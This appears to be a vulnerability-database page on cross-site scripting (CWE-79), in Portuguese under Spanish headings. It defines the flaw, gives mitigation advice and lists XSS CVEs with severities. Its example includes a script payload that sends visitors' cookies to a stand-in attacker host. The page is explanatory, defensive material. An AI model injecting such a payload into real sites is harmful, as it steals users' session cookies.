Fallos del tipo CWE-79

28.949 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2025-30223CRITICALBeego allows Reflected/Stored XSS in Beego's RenderForm() Function Due to Unescaped User InputEPSS 0.6%CVE-2021-21442MEDIUMXSS vulnerability in Time AccountingEPSS 0.6%CVE-2024-2081MEDIUMFooGallery <= 2.4.14 - Authenticated (Author+) Stored Cross-Site ScriptingEPSS 0.6%CVE-2021-29105MEDIUMThere is a stored Cross Site Scripting (XSS) vulnerability in Esri ArcGIS Server Services Directory version 10.8.1 and below.EPSS 0.6%CVE-2023-2298HIGHOnline Booking & Scheduling Calendar for WordPress by vcita <= 4.3.0 - Unauthenticated Stored Cross-Site ScriptingEPSS 0.6%CVE-2022-42486MEDIUMStored cross-site scripting vulnerability in User group management of baserCMS versions prior to 4.7.2 allows a remote authenticated attackeEPSS 0.6%CVE-2026-49995MEDIUMTautulli: Stored Cross-Site Scripting (XSS) in the newsletterEPSS 0.6%CVE-2022-46087MEDIUMCloudSchool v3.0.1 is vulnerable to Cross Site Scripting (XSS). A normal user can steal session cookies of the admin users through notificatEPSS 0.6%CVE-2024-8017CRITICALCross-site Scripting (XSS) in open-webui/open-webuiEPSS 0.6%CVE-2022-1840LOWHome Clean Services Management System cross site scriptingEPSS 0.6%CVE-2024-0826MEDIUMQi Addons For Elementor <= 1.6.7 - Authenticated (Contributor+) Stored Cross-Site ScriptingEPSS 0.6%CVE-2023-25763MEDIUMJenkins Email Extension Plugin 2.93 and earlier does not escape various fields included in bundled email templates, resulting in a stored crEPSS 0.6%CVE-2024-4036MEDIUMSydney Toolbox <= 1.30 - Authenticated (Contributor+) Stored Cross-Site ScriptingEPSS 0.6%CVE-2026-15401HIGHVikBooking Hotel Booking Engine & PMS <= 1.8.13 - Unauthenticated Stored Cross-Site Scripting via Custom Field 'vbfX' ParameterEPSS 0.6%CVE-2024-4156MEDIUMEssential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders <= 5.9.17 - Authenticated (Contributor+) Stored Cross-Site ScriptingEPSS 0.6%CVE-2021-25986MEDIUMDjango-wiki - Stored Cross-Site Scripting (XSS) in Notifications SectionEPSS 0.6%CVE-2024-11370MEDIUMSubaccounts for WooCommerce <= 1.6.0 - Reflected Cross-Site ScriptingEPSS 0.6%CVE-2022-0209MEDIUMMitsol Social Post Feed < 1.11 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2026-34605HIGHSiYuan: Reflected XSS via SVG namespace prefix bypass in SanitizeSVG ( getDynamicIcon, unauthenticated )EPSS 0.6%CVE-2023-25764MEDIUMJenkins Email Extension Plugin 2.93 and earlier does not escape, sanitize, or sandbox rendered email template output or log output generatedEPSS 0.6%